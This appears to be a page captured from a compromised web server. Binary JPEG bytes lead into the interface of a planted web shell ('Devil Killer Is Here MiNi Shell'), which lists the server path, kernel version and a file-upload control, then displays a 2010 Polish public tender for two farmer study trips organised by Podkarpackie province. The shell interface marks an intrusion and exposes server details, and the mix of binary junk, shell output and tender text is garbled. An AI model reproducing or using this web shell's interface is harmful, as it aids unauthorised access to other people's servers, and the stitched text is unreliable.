JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100903/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100903/240675-N-2010.html

<p class="kh_header"><b>Rzeszów: Organizacja i obsługa dwóch wyjazdów studyjnych dla rolników z terenu Województwa podkarpackiego.</b><br>
<b>Numer ogłoszenia: 240675 - 2010; data zamieszczenia: 03.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Województwo Podkarpackie , al. Łukasza Cieplińskiego 4, 35-010 Rzeszów, woj. podkarpackie, tel. 017 8501776, faks 017 8501701.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i obsługa dwóch wyjazdów studyjnych dla rolników z terenu Województwa podkarpackiego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Opis przedmiotu zamówienia:
Przedmiotem zamówienia jest organizacja i obsługa dwóch wyjazdów studyjnych dla rolników z terenu województwa podkarpackiego. 
Przedmiot zamówienia został podzielony na następujące części:

Część I 
Część pierwsza obejmuje organizację i obsługę wyjazdu studyjnego dla rolników do Litwy, Łotwy i Estonii w celu wymiany doświadczeń, nawiązania kontaktów z rolnikami, organizacjami rolniczymi, przedstawicielami lokalnych społeczności w tym Polonii i lokalnych grup biznesu. 

Podstawowe założenia
- Zakwaterowanie gości (47 osób), hotel/hotele min. 3*, pokoje 2,3,4 osobowe z łazienkami do dyspozycji gości, łącznie 6 noclegów. 
Specyfikacja noclegów: 
- 1 nocleg z 19 na 20 września 2010 r. w rejonie Suwałk (miasto lub okolice do 15 km),
- 2 noclegi z 20 na 21 września i 24 na 25 września 2010 r. w rejonie Wilna lub Solecznik (miasto lub okolice do 15 km), 
- 1 nocleg z 21 na 22 września 2010 r. w rejonie Rygi (miasto lub okolice do 15 km), 
- 2 noclegi z 22 na 23 i z 23 na 24 września w rejonie Tallina (miasto lub okolice do 15 km).    

- Transport samochodowy (autokar lub autokary, klasy Lux /WC, wideo, barek, klimatyzacja/) dla 47 osób przez cały okres wyjazdu (19 - 26 września) na trasie: Boguchwała - Wilno, Wilno - Ryga, Ryga - Tallin, Tallin - Boguchwała.  
- Wyżywienie: 
Wyżywienie obejmuje co najmniej 3 posiłki dziennie (śniadanie, obiad, kolację) z tym, że: 
śniadanie powinno każdorazowo obejmować lekki posiłek z możliwością wyboru dań (np. jajecznica, parówki na ciepło, zupa mleczna, żurek z jajkiem, pieczywo z wędliną lub dżemem, sałatka oraz napoje gorące i zimne: kawa lub herbata, woda mineralna, soki owocowe), 
obiad powinien każdorazowo obejmować posiłek złożony co najmniej z 3 dań tzn. z zupy i dania mięsnego lub jarskiego do wyboru oraz napojów zimnych i gorących a także deseru (deser nie dotyczy pierwszego i ostatniego dnia wyjazdu), 
kolacja powinna każdorazowo obejmować posiłek z możliwością wyboru potrawy przez uczestników wyjazdu na zasadzie szwedzkiego stołu oraz napojów gorących i zimnych.
- Obsługa agencyjna (w tym kompleksowa organizacja/koordynacja przed i w trakcie trwania wyjazdu, pełna koordynacja, hoteli, posiłków, przejazdów, pilota znającego język polski i krajowy (ewentualnie pilota i tłumacza), opieka 1 - 2 osób (przewodników, koordynatorów) w trakcie trwania imprezy, sprawdzenie i ustalenie wszystkich szczegółów na trasie, zapewnienie jak najniższych cen dla klienta).
- Ubezpieczenie NNW
- Zorganizowanie następujących spotkań i wizyt: 
- w dniu 20 września spotkanie z Merem Solecznik, przedstawicielami miejscowej Izby Rolniczej, wizyty w gospodarstwie rolnym, agroturystycznym w rejonie Solecznik, 
- w dniu 21 września w godzinach popołudniowych w trakcie przejazdu na trasie Wilno - Ryga wizyta w gospodarstwie rolnym lub zakładzie przetwórczym rolno-spożywczym, 
- w dniu 22 września w Rydze spotkanie z przedstawicielami Łotewskiej Izby Rolniczej oraz wizyta w gospodarstwie rolnym, 
- w dniu 23 września spotkanie z przedstawicielami Estońskiej Izby Rolniczej i wizyta/ty w gospodarstwach rolnych bądź zakładach przetwórczych (2 miejsca), 
- w dniu 24 września wizyta w Stowarzyszeniu Agroturystycznym w Trokach nad jeziorem Galve.    
Szczegółowy opis przedmiotu zamówienia zawarty jest w załączniku nr 7 do SIWZ.

Część II  
Część druga obejmuje organizację i obsługę wyjazdu studyjnego dla rolników do województwa wielkopolskiego w ramach Projektu pt: Konsolidacja gospodarcza towarowych gospodarstw rolnych województwa podkarpackiego. 

Podstawowe założenia 
- Zakwaterowanie gości (48 osób), hotel/hotele min. 3*, pokoje 2,3,4 osobowe z łazienkami do dyspozycji gości, łącznie 3 noclegi. 
Specyfikacja noclegów: 
- 2 noclegi z 23 na 24 i 24 na 25 września 2010 r. w rejonie Jarocina (miasto lub okolice do 15 km), 
- 1 nocleg z 25 na 26 września 2010 r. w rejonie Konina (miasto lub okolice do 15 km). 

- Transport samochodowy (autokar klasy Lux /WC, wideo, barek, klimatyzacja/) dla 48 osób przez cały okres wyjazdu (23 - 26 września) na trasie: Rzeszów - Jarocin, Jarocin - Konin, Konin- Rzeszów (w okolicach Jarocina i Konina objazdy łącznie ok. 200 km). 

- Wyżywienie: 
Wyżywienie obejmuje co najmniej 3 posiłki dziennie (śniadanie, obiad, kolację) z tym, że: 
śniadanie powinno każdorazowo obejmować lekki posiłek z możliwością wyboru dań (np. jajecznica, parówki na ciepło, zupa mleczna, żurek z jajkiem, pieczywo z wędliną lub dżemem, sałatka oraz napoje gorące i zimne: kawa lub herbata, woda mineralna, soki owocowe), 
obiad powinien każdorazowo obejmować posiłek złożony co najmniej z 3 dań tzn. z zupy i dania mięsnego lub jarskiego do wyboru oraz napojów zimnych i gorących a także deseru, 
kolacja powinna każdorazowo obejmować posiłek z możliwością wyboru potrawy przez uczestników wyjazdu na zasadzie szwedzkiego stołu lub karty dań oraz napojów gorących i zimnych. 
Wieczorem 23 września kolacja uroczysta (wykwintny bufet szwedzki dla 48 osób (przykładowe menu: schab faszerowany w sosie śliwkowym szarym, pstrąg pieczony, gulasz węgierski/bogracz, dodatki: ziemniaki opiekane, warzywa na parze, kulebiak drożdżowy, przekąski zimne: ryba maślana na warzywach, galantyna drobiowa w auszpiku galaretka drobiowa, wędliny: staropolski stojak wędlin: kiełbasa wiejska, boczek wędzony gotowany, udziec wieprzowy po staropolsku, smalec z skwarkami, sałatka grecka sałatka owocowa sałatka sezonowa, ogórki, sosy: czosnkowy, żurawinowy, tatarski, potrawa wegetariańska - placek po węgiersku z gulaszem warzywnym, owoce, chleb wiejski, pieczywo drobne, kruche ciastka, kawa, herbata, woda, soki, inne napoje - do uzgodnienia przed rozpoczęciem konferencji) obsługa kelnerska;

- Sala konferencyjna w okolicach Jarocina: wynajęcie i udostępnienie Sali konferencyjnej w okolicach Jarocina (preferowane miejsce zakwaterowania) w dniu 23 września. Sala udostępniona na 4 godz. (17:00 - 21:00 dla 51 osób, z nagłośnieniem konferencyjnym (możliwość podłączenia mikrofonów, rzutnika multimedialnego itp.),    

- Obsługa agencyjna (w tym kompleksowa organizacja/koordynacja przed i w trakcie trwania wyjazdu, pełna koordynacja, hoteli, posiłków, przejazdów, opieka 1 - 2 osób (przewodników, koordynatorów) w trakcie trwania imprezy, sprawdzenie i ustalenie wszystkich szczegółów na trasie.
- Ubezpieczenie NNW 
1) Zakres zadań Wykonawcy
Do zadań Wykonawcy należeć będzie:
a) Załączenie do oferty koncepcji (scenariusza wyjazdu).
b) Po podpisaniu umowy:

- realizacja przedmiotu zamówienia zgodnie z przedstawioną ofertą,
- opracowanie sprawozdania z realizacji przedmiotu zamówienia wraz z przekazaniem dokumentacji fotograficznej z jej przebiegu w terminie do 14 dni po zakończeniu wydarzenia.
Szczegółowy opis przedmiotu zamówienia zawarty jest w załączniku nr 7a do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.95.00.00-8, 79.54.00.00-1, 79.95.10.00-5, 70.22.00.00-9, 55.32.00.00-9, 55.11.00.00-4, 60.17.20.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 19.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy - w zakresie warunku udziału w postępowaniu, o którym mowa wyżej w celu ubiegania się o udzielenie zamówienia nie jest wymagane spełnianie przez wykonawców żadnych szczególnych wymogów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy - w zakresie warunku udziału w postępowaniu, o którym mowa wyżej w celu ubiegania się o udzielenie zamówienia nie jest wymagane spełnianie przez wykonawców żadnych szczególnych wymogów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy - w zakresie warunku udziału w postępowaniu, o którym mowa wyżej w celu ubiegania się o udzielenie zamówienia nie jest wymagane spełnianie przez wykonawców żadnych szczególnych wymogów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy - w zakresie warunku udziału w postępowaniu, o którym mowa wyżej w celu ubiegania się o udzielenie zamówienia nie jest wymagane spełnianie przez wykonawców żadnych szczególnych wymogów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy - w zakresie warunku udziału w postępowaniu, o którym mowa wyżej w celu ubiegania się o udzielenie zamówienia nie jest wymagane spełnianie przez wykonawców żadnych szczególnych wymogów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa w pkt. III.4.3.1 ogłoszenia, zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wrota.podkarpackie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Marszałkowski Województwa Podkarpackiego w Rzeszowie, 35-010 Rzeszów, al. Łukasza Cieplińskiego 4, pok. nr 207..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.09.2010 godzina 10:00, miejsce: Urząd Marszałkowski Województwa Podkarpackiego w Rzeszowie, 35-010 Rzeszów, al. Łukasza Cieplińskiego 4, pok. nr 207..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Termin realizacji zamówienia: 	
Część I od 19.09 - 26.09.2010 r.
Część II od 23.09 - 26.09.2010 r. 

Zamówienie finansowane jest z projektu Pomoc Techniczna Programu Rozwoju Obszarów Wiejskich.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Organizacja i obsługa wyjazdu studyjnego dla rolników do Litwy, Łotwy i Estonii w celu wymiany doświadczeń, nawiązania kontaktów z rolnikami, organizacjami rolniczymi, przedstawicielami lokalnych społeczności w tym Polonii i lokalnych grup biznesu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I 
Część pierwsza obejmuje organizację i obsługę wyjazdu studyjnego dla rolników do Litwy, Łotwy i Estonii w celu wymiany doświadczeń, nawiązania kontaktów z rolnikami, organizacjami rolniczymi, przedstawicielami lokalnych społeczności w tym Polonii i lokalnych grup biznesu. 

Podstawowe założenia

- Zakwaterowanie gości (47 osób), hotel/hotele min. 3*, pokoje 2,3,4 osobowe z łazienkami do dyspozycji gości, łącznie 6 noclegów. 
Specyfikacja noclegów: 
- 1 nocleg z 19 na 20 września 2010 r. w rejonie Suwałk (miasto lub okolice do 15 km),
- 2 noclegi z 20 na 21 września i 24 na 25 września 2010 r. w rejonie Wilna lub Solecznik (miasto lub okolice do 15 km), 
- 1 nocleg z 21 na 22 września 2010 r. w rejonie Rygi (miasto lub okolice do 15 km), 
- 2 noclegi z 22 na 23 i z 23 na 24 września w rejonie Tallina (miasto lub okolice do 15 km).    

- Transport samochodowy (autokar lub autokary, klasy Lux /WC, wideo, barek, klimatyzacja/) dla 47 osób przez cały okres wyjazdu (19 - 26 września) na trasie: Boguchwała - Wilno, Wilno - Ryga, Ryga - Tallin, Tallin - Boguchwała.  

- Wyżywienie: 
Wyżywienie obejmuje co najmniej 3 posiłki dziennie (śniadanie, obiad, kolację) z tym, że: 
śniadanie powinno każdorazowo obejmować lekki posiłek z możliwością wyboru dań (np. jajecznica, parówki na ciepło, zupa mleczna, żurek z jajkiem, pieczywo z wędliną lub dżemem, sałatka oraz napoje gorące i zimne: kawa lub herbata, woda mineralna, soki owocowe), 
obiad powinien każdorazowo obejmować posiłek złożony co najmniej z 3 dań tzn. z zupy i dania mięsnego lub jarskiego do wyboru oraz napojów zimnych i gorących a także deseru (deser nie dotyczy pierwszego i ostatniego dnia wyjazdu), 
kolacja powinna każdorazowo obejmować posiłek z możliwością wyboru potrawy przez uczestników wyjazdu na zasadzie szwedzkiego stołu oraz napojów gorących i zimnych.

- Obsługa agencyjna (w tym kompleksowa organizacja/koordynacja przed i w trakcie trwania wyjazdu, pełna koordynacja, hoteli, posiłków, przejazdów, pilota znającego język polski i krajowy (ewentualnie pilota i tłumacza), opieka 1 - 2 osób (przewodników, koordynatorów) w trakcie trwania imprezy, sprawdzenie i ustalenie wszystkich szczegółów na trasie, zapewnienie jak najniższych cen dla klienta).
- Ubezpieczenie NNW
- Zorganizowanie następujących spotkań i wizyt: 
- w dniu 20 września spotkanie z Merem Solecznik, przedstawicielami miejscowej Izby Rolniczej, wizyty w gospodarstwie rolnym, agroturystycznym w rejonie Solecznik, 
- w dniu 21 września w godzinach popołudniowych w trakcie przejazdu na trasie Wilno - Ryga wizyta w gospodarstwie rolnym lub zakładzie przetwórczym rolno-spożywczym, 
- w dniu 22 września w Rydze spotkanie z przedstawicielami Łotewskiej Izby Rolniczej oraz wizyta w gospodarstwie rolnym, 
- w dniu 23 września spotkanie z przedstawicielami Estońskiej Izby Rolniczej i wizyta/ty w gospodarstwach rolnych bądź zakładach przetwórczych (2 miejsca), 
- w dniu 24 września wizyta w Stowarzyszeniu Agroturystycznym w Trokach nad jeziorem Galve.    
Szczegółowy opis przedmiotu zamówienia zawarty jest w załączniku nr 7 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.95.00.00-8, 79.54.00.00-1, 79.95.10.00-5, 70.22.00.00-9, 55.32.00.00-9, 55.11.00.00-4, 60.17.20.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 19.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Organizacja i obsługa wyjazdu studyjnego dla rolników do województwa wielkopolskiego w ramach Projektu pt: Konsolidacja gospodarcza towarowych gospodarstw rolnych województwa podkarpackiego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II  
Część druga obejmuje organizację i obsługę wyjazdu studyjnego dla rolników do województwa wielkopolskiego w ramach Projektu pt: Konsolidacja gospodarcza towarowych gospodarstw rolnych województwa podkarpackiego. 

Podstawowe założenia 
- Zakwaterowanie gości (48 osób), hotel/hotele min. 3*, pokoje 2,3,4 osobowe z łazienkami do dyspozycji gości, łącznie 3 noclegi. 
Specyfikacja noclegów: 
- 2 noclegi z 23 na 24 i 24 na 25 września 2010 r. w rejonie Jarocina (miasto lub okolice do 15 km), 
- 1 nocleg z 25 na 26 września 2010 r. w rejonie Konina (miasto lub okolice do 15 km). 

- Transport samochodowy (autokar klasy Lux /WC, wideo, barek, klimatyzacja/) dla 48 osób przez cały okres wyjazdu (23 - 26 września) na trasie: Rzeszów - Jarocin, Jarocin - Konin, Konin- Rzeszów (w okolicach Jarocina i Konina objazdy łącznie ok. 200 km). 

- Wyżywienie: 
Wyżywienie obejmuje co najmniej 3 posiłki dziennie (śniadanie, obiad, kolację) z tym, że: 
śniadanie powinno każdorazowo obejmować lekki posiłek z możliwością wyboru dań (np. jajecznica, parówki na ciepło, zupa mleczna, żurek z jajkiem, pieczywo z wędliną lub dżemem, sałatka oraz napoje gorące i zimne: kawa lub herbata, woda mineralna, soki owocowe), 
obiad powinien każdorazowo obejmować posiłek złożony co najmniej z 3 dań tzn. z zupy i dania mięsnego lub jarskiego do wyboru oraz napojów zimnych i gorących a także deseru, 
kolacja powinna każdorazowo obejmować posiłek z możliwością wyboru potrawy przez uczestników wyjazdu na zasadzie szwedzkiego stołu lub karty dań oraz napojów gorących i zimnych. 
Wieczorem 23 września kolacja uroczysta (wykwintny bufet szwedzki dla 48 osób (przykładowe menu: schab faszerowany w sosie śliwkowym szarym, pstrąg pieczony, gulasz węgierski/bogracz, dodatki: ziemniaki opiekane, warzywa na parze, kulebiak drożdżowy, przekąski zimne: ryba maślana na warzywach, galantyna drobiowa w auszpiku galaretka drobiowa, wędliny: staropolski stojak wędlin: kiełbasa wiejska, boczek wędzony gotowany, udziec wieprzowy po staropolsku, smalec z skwarkami, sałatka grecka sałatka owocowa sałatka sezonowa, ogórki, sosy: czosnkowy, żurawinowy, tatarski, potrawa wegetariańska - placek po węgiersku z gulaszem warzywnym, owoce, chleb wiejski, pieczywo drobne, kruche ciastka, kawa, herbata, woda, soki, inne napoje - do uzgodnienia przed rozpoczęciem konferencji) obsługa kelnerska;

- Sala konferencyjna w okolicach Jarocina: wynajęcie i udostępnienie Sali konferencyjnej w okolicach Jarocina (preferowane miejsce zakwaterowania) w dniu 23 września. Sala udostępniona na 4 godz. (17:00 - 21:00 dla 51 osób, z nagłośnieniem konferencyjnym (możliwość podłączenia mikrofonów, rzutnika multimedialnego itp.),    

